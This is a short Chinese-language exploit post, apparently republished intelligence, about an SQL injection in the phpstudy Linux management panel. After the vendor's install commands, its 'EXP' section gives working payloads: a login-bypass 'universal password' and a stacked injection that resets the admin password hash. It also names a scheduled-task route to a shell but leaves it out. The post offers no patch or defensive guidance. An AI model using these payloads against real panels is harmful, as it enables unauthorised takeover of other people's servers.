【利刃情报】phpstudy-linux面板(小皮面板)存在SQL注入漏洞
2023-3-25 00:0:51 Author: 利刃信安攻防实验室(查看原文) 阅读量:56 收藏

phpstudy-linux面板(小皮面板)

https://www.xp.cn/linux.html

升级日志:

1、修复phpmyadmin有时候无法打开的问题

2、提升系统稳定性

3、系统安全性常规升级

无docker版本

yum install -y wget && wget -O install.sh https://notdocker.xp.cn/install.sh && sh install.sh

docker版本

yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh

参考视频

https://www.bilibili.com/video/BV1Yc411j7TP/

EXP

万能密码

admin' and 1=1 #

万能密码默认使得程序直接崩溃,无法直接利用

堆叠注入

admin';update admins set password='c464514e8891b00a0cf575afc4248f9f';--

后台计划任务GETSHELL

略过

利用难点

寻找后台地址


文章来源: http://mp.weixin.qq.com/s?__biz=MzU1Mjk3MDY1OA==&mid=2247501856&idx=3&sn=47e42516db886c33c8d1ebbc9e317c4d&chksm=fbfb78edcc8cf1fba1e4f6e5195b8200f3ee03e13a38aecc9dac85772003c42c8c07d8f00193#rd
如有侵权请联系:admin#unsafe.sh